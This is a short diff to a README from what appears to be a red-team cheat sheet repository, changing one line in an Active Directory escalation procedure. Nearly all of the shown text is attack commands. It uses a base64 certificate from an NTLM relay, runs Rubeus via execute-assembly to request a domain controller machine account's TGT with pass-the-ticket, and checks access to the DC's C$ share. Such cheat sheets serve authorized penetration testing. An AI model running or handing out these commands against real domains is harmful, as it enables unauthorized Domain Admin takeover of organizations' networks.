wsummerhill/C2_RedTeam_CheatSheets/README.md

 # NTLM relay output will have base64 ticket of target DC machine account
 # Use Rubeus to request TGT of DC machine account to esclate to Domain Admin
-execute-assembly Rubeus.exe asktgt /dc:<DC-IP> /domain:domain.com /user:<DC-Machine-account>$ /ptt /certificate:<base64-ticket-from-output>
+execute-assembly C:\Rubeus.exe asktgt /dc:<DC-IP> /domain:domain.com /user:<DC-Machine-account>$ /ptt /certificate:<base64-ticket-from-output>

 # Verify asktgt command worked by doing an 'ls' command on the DC
 ls \\<DC-IP>\c$